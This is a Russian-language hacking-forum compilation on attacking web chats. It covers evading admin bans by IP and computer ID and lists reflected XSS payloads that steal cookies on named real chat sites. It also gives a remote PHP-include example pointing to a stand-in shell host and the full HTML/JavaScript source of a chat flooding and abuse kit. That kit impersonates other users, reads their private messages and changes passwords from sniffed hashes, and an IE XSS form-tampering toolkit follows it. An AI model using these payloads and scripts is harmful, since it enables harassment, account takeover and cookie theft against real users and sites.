ПОКАЗАТЬ/СКРЫТЬ ТЕКСТ
Во многих чатах, Админ может вас забанить по нескольким параметрам:
-по нику
-по мылу
-по IP-адресу
-по Comp_ID
Первые два пункта обходятся сменой ника и мыла.
Обход бана по IP-адресу.
1) Выйдите из чата.
2) Удалите cookies для данного чата. Закройте окно браузера.
3) Измените IP, используя прокси.
1.я думаю с первым пунктом все справятся...
2.в браузере(Internet Explorer) нажмите Сервис -> Свойства обозревателя -> удалить "Cookies".
3.для прокси используйте A4Proxy,Hide.IP.Platinum.v2.1 (ищите более новые версии) или [forbidden link]
и вот еще програмка, которая меняет ID браузера при "Супер Бане" (Только на форумах FastBB)АнтиБан
Обход бана по Comp_ID.
к примеру возьмем Comp_ID: yjQVj1KUZbd45, он состоит из 13 символов(это всегда).
1,2,3,4 символы - это то, что передаётся ява скриптом при входе на страничку сайта, чата, форума и меняются эти символы Этой программой
9,10 символы - это юзер агент! он меняется переходом на другой браузер или сменой в реестре:
заходим в реестр (пуск->выполнить->regedit)
ищем там этот раздел:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Internet Settings\User Agent\Post Platform[/code]
Создаем в этом разделе строковый параметр с именем "Ultra-pooper post platform" и значением, к примеру, "IEAK".
и заходим в браузер!
И еще можно эти символы поменять с помощью этой программки RMOSChange
11 и 5,6,7,8 символы - часовой пояс. меняем часовой пояс и всё ок.
12-ый - глубина цвета. меняем глубину цвета в настройках экрана.
13-ый - разрешение экрана. меняем разрешение экрана.
ПОКАЗАТЬ/СКРЫТЬ ТЕКСТ
------------------------- Vodoo CHAT ---------------------------
Type:[XSS]
Product: Voodoo chat
Author: qBiN
Exploit:
http://site.com/chat/go.php?url=java script:alert(/Tested%20by%20qBiN/);
[/code]
Решение: фильтровать переменную урл,можно даже проверять её на валидность
с помощью сокетов.
------------------------------
Type:[XSS]
Product: Voodoo chat
Author: qBiN
Exploit:
http://sitename/chat.....t>alert(/qBiN test/);%3C/script%3E
[/code]
------------------------------
Type:[PHP Including]
Product: Voodoo chat 1.0RC1b и возможно болие ранние версий.
Источник: xakep.ru
Пример:
http://sitename.com/[ScriptPath]/index.php?file_path=http://SHELLURL.COM?
[/code]
------------------------------
Type:FLOODER
Product: Voodoo chat
Author: NaX[no]r†
exploit: http://www.balartrating.ru/flood.zip
------------------------- ЧАТ БОРОДИНА ---------------------------
Может матерьял немного стар но всёже http://antichat.ru/txt/chat_borodin/
Видео лежит здесь http://video.antichat.net/videos/chat_borodin.rar
Уязвимость нашел: Morph
Автор статьи: Morph
------------------------- NAROD Chat ---------------------------
Type:[XSS]
Product: NAROD Chat
Author: [sL1p]
Exploit: Passive XSS:
[url="http://www.shram.kiev.ua/click?http://www.yandex.ru/cgi-bin/customize.pl?yxqs="><script>alert(document.cookie)</script>"]http://www.yandex.ru/cgi-bin/customize.pl?...</script>[/url]
[/code]
------------------------- Уязвимости конкретных чатов ---------------------------
Type:[XSS]
Product: www.bazar.co.ua
Author: max_pain89
Exploit: Passive ХSS:
http://www.bazar.co.ua/?error[]=<script>confirm(/xxx/)</script>
[/code]
------------------------------
Type:[XSS]
Product: www.sibchat.ru
Author: [sL1p], Kaban
Exploit: Passive ХSS:
http://www.sibchat.ru/gallery.php?sid='...</script> [url="http://www.shram.kiev.ua/click?http://www.sibchat.ru/card_help.php?sid="><script>alert(document.cookie)</script>"]http://www.sibchat.ru/card_help.php?sid=&q...</script>[/url] [url="http://www.shram.kiev.ua/click?http://www.sibchat.ru/register.php?sid="><script>alert(document.cookie)</script>"]http://www.sibchat.ru/register.php?sid=&qu...</script>[/url]
[/code]
------------------------------
Type:[XSS]
Product: www.chatinez.zp.ua
Author: [sL1p]
Exploit: Passive XSS:
[url="http://www.shram.kiev.ua/click?http://chatinet.zp.ua/winter2005/party/?001=6941337<a>%22%27"><script>alert(document.cookie)</script>"]http://chatinet.zp.ua/winter2005/party/?00...</script>[/url]
При желании 001 Можно заменить на:
002, 003, 004, 005, 006, 007, 008, 009, 010, 011, 012, 013, 014, 015, 016[/code]
------------------------------
Type:[XSS]
Product: www.smchat.ru
Author: [sL1p]
Exploit: Passive XSS:
[url="http://www.shram.kiev.ua/click?http://www.smchat.ru/?key="><script>alert(document.cookie)</script>"]http://www.smchat.ru/?key="><s...</script>[/url] [url="http://www.shram.kiev.ua/click?http://www.smchat.ru/?chatname=&key="><script>alert(document.cookie)</script>"]http://www.smchat.ru/?chatname=&key=&q...</script>[/url] [url="http://www.shram.kiev.ua/click?http://www.smchat.ru/?ontopic=default&login="><script>alert(document.cookie)</script>"]http://www.smchat.ru/?ontopic=default&...</script>[/url] [url="http://www.shram.kiev.ua/click?http://www.smchat.ru/?activate=&login="><script>alert(document.cookie)</script>"]http://www.smchat.ru/?activate=&login=...</script>[/url] [url="http://www.shram.kiev.ua/click?http://www.smchat.ru/?password1=&login="><script>alert(document.cookie)</script>"]http://www.smchat.ru/?password1=&login...</script>[/url] [url="http://www.shram.kiev.ua/click?http://www.smchat.ru/?det=default&login="><script>alert(document.cookie)</script>"]http://www.smchat.ru/?det=default&logi...</script>[/url] [url="http://www.shram.kiev.ua/click?http://www.smchat.ru/?count=1000&key="><script>alert(document.cookie)</script>"]http://www.smchat.ru/?count=1000&key=&...</script>[/url] [url="http://www.shram.kiev.ua/click?http://www.smchat.ru/?email=&key="><script>alert(document.cookie)</script>"]http://www.smchat.ru/?email=&key="...</script>[/url]
[/code]
------------------------------
Type:[XSS]
Product: www.chat.ru
Author: [sL1p]
Exploit: Passive XSS:
[url="http://www.shram.kiev.ua/click?http://www.chat.ru/user/register.html?dop10=default&confemail="><script>alert(document.cookie)</script>"]http://www.chat.ru/user/register.html?dop1...</script>[/url] [url="http://www.shram.kiev.ua/click?http://www.chat.ru/user/register.html?anotherpw="><script>alert(document.cookie)</script>"]http://www.chat.ru/user/register.html?anot...</script>[/url] [url="http://www.shram.kiev.ua/click?http://www.chat.ru/user/register.html?city=&name="><script>alert(document.cookie)</script>"]http://www.chat.ru/user/register.html?city...</script>[/url] [url="http://www.shram.kiev.ua/click?http://www.chat.ru/user/register.html?action=default&username="><script>alert(document.cookie)</script>"]http://www.chat.ru/user/register.html?acti...</script>[/url] [url="http://www.shram.kiev.ua/click?http://www.chat.ru/user/register.html?city=&year="><script>alert(document.cookie)</script>"]http://www.chat.ru/user/register.html?city...</script>[/url]
[/code]
Комбинируя запросы можно реализовать гораздо больше xss чем в этом списке.
------------------------------
Type:[XSS]
Product: www.krovatka.ru
Author: [sL1p], blackybr
Exploit: Passive XSS:
[url="http://www.shram.kiev.ua/click?http://klubnichka.krovatka.ru/k?f=45&newwin=1&id2=5816&id=5673xee7kY1Y&c=8"><script>alert(document.cookie)</script>"]http://klubnichka.krovatka.ru/k?f=45&n...</script>[/url] [url="http://www.shram.kiev.ua/click?http://klubnichka.krovatka.ru/f/e.cgi?c=6&n="><script>alert(document.cookie)%3B</script>"]http://klubnichka.krovatka.ru/f/e.cgi?c=6&...</script>[/url] [url="http://www.shram.kiev.ua/click?http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn="><script>alert(document.cookie)%3B</script>"]http://klubnichka.krovatka.ru/people/pp33....</script>[/url] [url="http://www.shram.kiev.ua/click?http://klubnichka.krovatka.ru/sms/xp.cgi?mn="><script>alert(document.cookie)%3B</script>&ch=6&flag=0"]http://klubnichka.krovatka.ru/sms/xp.cgi?m...ch=6&flag=0[/url] http://klubnichka.kr.......e)</script>
[/code]
Для примера взят канал klubnichka, изменяя название канала естесственно можно реализовывать xss везде.
------------------------------
Type:[XSS]
Product: www.chatcity.ru
Author: [sL1p]
Код:
http://www.Chat ID.chatcity.ru/people/pp33.cgi?c=Chat ID&nn="><script>alert(document.cookie)</script>
Chat ID заменяем на адрес чата. У всех они в цифровом значении.
------------------------------
ПОКАЗАТЬ/СКРЫТЬ ТЕКСТ
Как пользоваться:
Адрес чата в <BASE HREF="http://neuch.ru/chat/">
(Нужно указать путь именно к папке чата, иногда бывает chat\chat\)
Кнопка Остановить флуд для остановки любого вида флуда
Вход от разных ников флудит так:
"user0 входит в комнату"
"user1 входит в комнату"
"user2 входит в комнату"
Вход и флуд от разных ников:
То же самое, только каждый вошедший оставляет одну месагу
Вход:
Просто войти в чат, чтобы можно было флудить от одного юзера
То, что ниже заголовка Отправка сообщений - для флуда от одного юзера
От всех юзеров на IE:
Можно писать от лица всех других кто на IE
Другие полезные функции
Сменить пасс
Хеш со снифера и логин, чтобы войти в профайл, просто так быстрее сменить его пас
(уже не актуально, так как хеш вообще не нужен, чтобы поиметь пользователя)
Чужой приват:
Читать сабж
Отправка скриптов для Мазилы
Для браузера Mozilla, просто там \x3c \x3e не катят, там по особому
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251"> <META NAME="Author" CONTENT="Advanced Lamer"> <META NAME="Description" CONTENT="Flooder"> <style> td {background-color:#ADD8E6;} th {background-color:#ADD8E6;} </style> <script> var i=0 var j=0; var temp var firstnick function flood() { if (fl==1) { MsgForm.submit() j++; MsgForm.elements[19].value=" "+j; time=Number(document.timeout.elements[0].value) setTimeout("flood()",time) } } function send() { document.MsgForm.elements[14].value=temp document.MsgForm.elements[16].value=document.form0.elements[7].value MsgForm.submit() time=Number(document.timeout.elements[0].value) setTimeout("enterflood(1)",time) } function enterflood(a) { if (fl==1) { temp=firstnick+i i=i+1 document.form0.elements[5].value=temp document.form0.submit() time=Number(document.timeout.elements[0].value) if (a==1) setTimeout("send()",time) else setTimeout("enterflood(0)",time) } } function enterflood0(b) { firstnick=document.form0.elements[5].value enterflood(b) } function infa() { var url_="http://neuch.ru/chat/whois_popup.php3?L=russian&&U="+document.func.elements[1].value inf=window.open(url_) } function allie() { document.MsgForm.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function allie1() { document.MsgForm1.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function clearmsg() { document.MsgForm.M.value="" } function clearmsg1() { document.MsgForm1.M.value="" } function privat() { var url_="http://neuch.ru/chat/messagesL.php3??From=index.php3&L=russian&Ver=H&U="+document.func.elements[3].value+"&R="+document.func.elements[4].value+"&T=1&D=15&N=40&ST=1&NT=1&PWD_Hash=1220be894c466859602499e1ea2172b0&First=1" priv=window.open(url_) } function changepass() { var cp=window.open("","","width=800,height=600","scrollbars=no,resizable=no,toolbar=no,menubar=no,l ocation=no") cp.document.write("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=windows-1251\">\n<META NAME=\"Author\" CONTENT=\"Advanced Lamer\">\n<META NAME=\"Description\" CONTENT=\"Flooder\">\n<META NAME=\"Keywords\" CONTENT=\"neuch, flood\">\n<style>\ntd {background-color:#ADD8E6}\n</style>\n") cp.document.write("<script>\n") cp.document.write("function addhidden()\n{\ndocument.forms[0].AUTH_USERNAME.value=document.forms[0].U.value\ndocument.forms[0].submit()\n}\n") cp.document.write("<\/script>\n") cp.document.write("</HEAD>\n<BODY bgcolor=#008B8B>\n") cp.document.write("<FORM ACTION=\"http://neuch.ru/chat/edituser.php3\" METHOD=POST>\n") cp.document.write("<INPUT type=hidden name=FORM_SEND value=1>\n") cp.document.write("<INPUT type=hidden name=AUTH_USERNAME value=\"\">\n") cp.document.write("<INPUT TYPE=hidden NAME=PASSWORD SIZE=20 MAXLENGTH=30 VALUE=\"\">\n") cp.document.write("<table border=1 bordercolor=blue cellpadding=10 align=center><tr><td>Хеш<td><INPUT type=text size=35 name=AUTH_PASSWORD value=\"\">\n") cp.document.write("<INPUT TYPE=hidden NAME=L VALUE=russian>\n") cp.document.write("<tr><td>Имя<td><INPUT TYPE=text NAME=U SIZE=25 MAXLENGTH=30 VALUE=\"\">\n") cp.document.write("<tr><td align=center colspan=2><INPUT TYPE=button NAME=submit_type VALUE=Профайл onclick=addhidden()>\n") cp.document.write("</table>\n") cp.document.write("</FORM>") cp.document.write("</BODY>\n</HTML>") } </script> <TITLE>"Набор скриптов для издевательства над чатом" от Advanced Lamer'а v1.1</TITLE> <BASE HREF="http://neuch.ru/chat/"> </HEAD> <BODY bgcolor=#008B8B topmargin=0 leftmargin=0> <script> var fl fl=0 </script> <h1 align=center><font size=5 color=yellow face=verdana>Вход в чат</font></h1> <FORM name=form0 ACTION="index.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="Ver" VALUE="L"> <INPUT TYPE="hidden" NAME="Form_Send" VALUE="1"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <table border=1 bordercolor=blue cellpadding=5 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" SIZE=20 MAXLENGTH=20 VALUE="hackme" onchange="java script:i=0;"> <script> firstnick=document.form0.elements[5].value </script> <tr> <td> <font size=5 color=navy face=verdana>Пасс:</font> <td> <INPUT TYPE="password" NAME="PASSWORD" SIZE=20 MAXLENGTH=20> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R0" size=30 value=Общая> <tr> <td> <font size=5 color=navy face=verdana>Общедоступная</font> <td> <INPUT TYPE="text" NAME="R1" size=30> <tr> <td> <font size=5 color=navy face=verdana>Приватная</font> <td> <INPUT TYPE="text" NAME="R2" SIZE=30> <tr> <td align=center rowspan=2> <INPUT TYPE="submit" value="Вход"> <td align=center> <INPUT TYPE="button" value="Вход и флуд от разных ников" onclick="java script:fl=1;enterflood0(1)"> <tr> <td align=center> <INPUT TYPE="button" value="Вход от разных ников" onclick="java script:fl=1;enterflood0(0)"> </table> </FORM> <p> <h1 align=center><font size=5 color=yellow face=verdana>Отправка сообщений</font></h1> <p> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30% align=center> <font size=3 color=navy face=verdana>Таймаут (мс):</font> <td align=center> <form name=timeout><input type=text maxlength=8 size=8 value=1000></form> <tr> <td colspan=2 align=center> <form name=stop><input type=button value="Остановить флуд" onclick="java script:fl=0;document.form0.elements[5].value=firstnick"></form> </table> <script> var time=Number(document.timeout.elements[0].value) </script> <p> <FORM NAME="MsgForm" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Цвет:</font> <td> <input type=text name="C" value=blue> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=80 rows=10>Флуд!!! </textarea> <tr> <th> <INPUT TYPE="button" VALUE="Flood" onclick="java script:fl=1;flood()"> <font size=2 color=navy face=verdana>Отправлено <input type=text size=4> сообщений</font> <script> MsgForm.elements[19].value=" 0"; </script> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie()> <input type=button value="Очистить" onclick=clearmsg()> </table> </FORM> <p> <h1 align=center><font size=5 color=yellow face=verdana>Другие полезные функции</font></h1> <form name=func> <table border=2 bordercolor=blue cellpadding=20 align=center width=50%> <tr> <td align=center> <input type=button value="Сменить пасс" onclick=changepass()> <tr> <td align=center> <INPUT TYPE=TEXT name=infauser size=20 value=""> <input type=button value="Инфа о пользователе" onclick=infa()> <tr> <td align=center> <font size=3 color=navy face=verdana>Юзер:</font> <input type=text size=20> <font size=3 color=navy face=verdana>Комната:</font> <input type=text size=20 value="Общая"> <input type=button value="Чужой приват" onclick=privat()> </table> </form> <p> <h1 align=center><font size=5 color=yellow face=verdana>Отправка скриптов для Мазилы</font></h1> <FORM NAME="MsgForm1" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=70 rows=5>>>>>> </textarea> <tr> <td> <font size=5 color=navy face=verdana>Скрипты:</font> <td> <textarea NAME="C" cols=70 rows=10>"> <script> window.parent.window.input.document.MsgForm.M.valu e=window.parent.window.input.document.MsgForm.PWD_ Hash.value;window.parent.window.input.document.MsgForm.submi t() </script> </</textarea><tr> <th> <INPUT TYPE="button" VALUE="Отправить" onclick="java script:document.MsgForm1.submit()"> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie1()> <input type=button value="Очистить" onclick=clearmsg1()> </table> </FORM> <!-- © Advanced Lamer, 2005 --> </BODY> </HTMLСохраняем в *.htm и пользуемся
IE XSS Kit
ПОКАЗАТЬ/СКРЫТЬ ТЕКСТ
Решил вот на досуге рассмотреть набор инструментов для xss, который лежит на сайте античата. Скачать IE xss kit Ещё небольшое предисловие. Запостил я всё это в этот раздел т.к. этот набор поможет в поиске уязвимостей в чате и немного повысит ваши возможности. Сегодня я кратко расскажу про редактор форм:
Form_Select-one2Text
Этот редактор форм позволяет нам превращать фреймы с зашитыми опциями, в собственный полигон для испытаний.
Начнём с самого простого, в большинстве чатов есть выбор цвета который в html виде производится таким образом:
<OPTION selected VALUE="Black" STYLE="color:black">Чёрный </OPTION>
[/code]
В действительности это выглядит вот так:

Как видите есть зашитые цвета, использование других пока что невозможно. Теперь мы подводим курсор мышки к фрейму с выбором цвета, щёлкаем правой кнопкой и выбираем команду Form_Select-one2Text И вот этот фрейм со строгим выбором цвета становится пустым фреймом с возможностью записи туда любого текста. (только не всё что вы напишите будет работать) Вот как он выглядит после применения Form_Select-one2Text :

Теперь у вас есть возможность ввести любой код цвета, например #FFFFFF. Так же эта команда делает многие фреймы свободными для редактирования. (Например в одном чате при выборе пола я сделал себе "Кошмарный Гермофродит"). Так же можно и напрямую искать xss уязвимости, подставляя этот код в ставшие доступными нам фреймы.
Вот здесь лежат множество кодов, способных вызвать alert и собственно найти xss. Теперь вы ознакомлены с редактором форм Form_Select-one2Text
Form_Method2Text, Form_Hidden2Text
Начнём с Form_Method2Text. Сама по себе команда не очень нужна, т.к. она открывает фрейм где написан метод работы со страницей. Самые основные методы это: post и get. Метод post означает что вы вносите свои данные на страницу. Чаще всего он встречается на форумах, гостевых книгах, чатах и т.д. Метод get означает что вы получаете какие либо данные от самой страницы, чаще всего он используется в поисковых системах, этот метод можно встретить почти везде. В общем эта команда ничем не примечательна, но она так же как и остальные даёт доступ к открытому фрейму. И конечно же в некоторых интернет ресурсах если заменить пост или гет на код xss, то яваскрипт успешно выполняется.Теперь пройдёмся по команде Form_Hidden2Text. Сама по себе эта команда позволяет просмотреть данные которые зашиты в странице (сорцы) и даёт возможность их подкорректировать.
Покажу вам наглядный пример. Тестировал я этот метод на одном из чатов чатсити, когда нужно отправить отчёт об ошибке.
Вот он: _http://www.38557.chatcity.ru/bug/?err=IllegalChannel(get_ch)&www.38557.chatcity.ru&
Скрин делать не буду, т.к. зайдёте по ссылке и сами всё увидете. Теперь на этой странице используем команду Form_Hidden2Text, как видите открываются фреймы с данными пользователя который зашёл на эту страницу. (Так же они есть в сорцах) Теперь их можно редактировать, объясню зачем это нужно. При отправлении отчёта о ошибке администратору чатсити прийдут как раз те самые данные которые стали нам доступными для редактирования. Это наводит на мысль, что можно в этот раз остаться анонимным. Вот скрин того что нам открылось:

Как видно можно всё стереть или подставить чужие данные.
И вот это же самое хранится в сорцах:
<input type=hidden name=err value="IllegalChannel(get_ch)"> <input type=hidden name=browser value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"> <input type=hidden name=addr value="айпи мой

[/code]
Но теперь мы всё можем отредактировать и остаться анонимными, написав администрации пару ласковых
Вот и всё, что могут эти две команды.
Form_Target2Text
LocationReplace
При выполнении этой команды, происходит запрос сценария через метод prompt, запрос идёт на какую либо страницу. В общем не буду ходить вокруг да около, эта команда довольно бесполезна при поиске xss, т.к. чтобы вы не написали, любой ваш текст добавится к изначальнуму адресу страницы с которой вы выполнили команду.Пример:
_http://www.ya.ru/
Используем LocationReplace, выпадает окошко, вписываем туда простую конструкцию:
<script>alert(/test/)</script>
Жмём ОК, и нас перебрасывает на: _http://www.ya.ru/<script>alert(/test/)</script>
Толку никакого.. Этот способ для тех, кому лень самим прописать в адресной строке код и не более. Так же его можно использовать как рефферер.
-------------------------------------------------------------------
Здесь я выложу все html коды, которыми оперирует набор IE xss kit.
Cookies:
<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zExpires() { var expires = new Date(); expires.setYear(expires.getYear() + 10); return expires.toUTCString(); } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zCookie = zDocument.cookie; var zNew = zWindow.prompt('New Cookie?', zCookie); if (zNew != null) { var zNewCookie = zWindow.prompt('New Cookie:', '; EXPIRES=' + zExpires() + ';'); if (zNewCookie != null) zDocument.cookie = zNewCookie; } </script>
[/code]
Action2Text:
<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { with (zForms[i]) { if (!zForms[i].zAction) { innerHTML = '<input type="text" id="zAction" value="' + zConvert(action) + '" title="action" onChange="document.forms[' + i + '].action = this.value">' + innerHTML; } } } </script>
[/code]
Checkbox2Text:
<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'checkbox') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '" onDblClick="this.outerHTML = \'\'">'; } } } } </script>
[/code]
EventsOFF:
<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var ii in zForms[i]) { if (ii.match(/^on/i) && (zForms[i].getAttribute(ii) != null)) { zForms[i].setAttribute(ii, null); } } for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { for (var jj in zForms[i].elements[j]) { if (jj.match(/^on/i) && (zForms[i].elements[j].getAttribute(jj) != null)) { zForms[i].elements[j].setAttribute(jj, null); } } } } </script>
[/code]
Hidden2Text:
<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'hidden') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '">'; } } } } </script>
[/code]
Method2Text:
<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { with (zForms[i]) { if (!zForms[i].zMethod) { innerHTML = '<input type="text" id="zMethod" value="' + zConvert(method) + '" title="method" onChange="document.forms[' + i + '].method = this.value">' + innerHTML; } } } </script>
[/code]
Radio2Text:
<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'radio') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '" onDblClick="this.outerHTML = \'\'">'; } } } } </script>
[/code]
Select-One2Text:
<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'select-one') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '">'; } } } } </script>
[/code]
Target2Text:
<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { with (zForms[i]) { if (!zForms[i].zTarget) { innerHTML = '<input type="text" id="zTarget" value="' + zConvert(target) + '" title="target" onChange="document.forms[' + i + '].target = this.value">' + innerHTML; } } } </script>
[/code]
LocationReplace:
<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru var zWindow = external.menuArguments; var zLocation = zWindow.location; var zNewLocation = zWindow.prompt('New Location:', zLocation); if (zNewLocation != null) zLocation.replace(zNewLocation); </script>
[/code]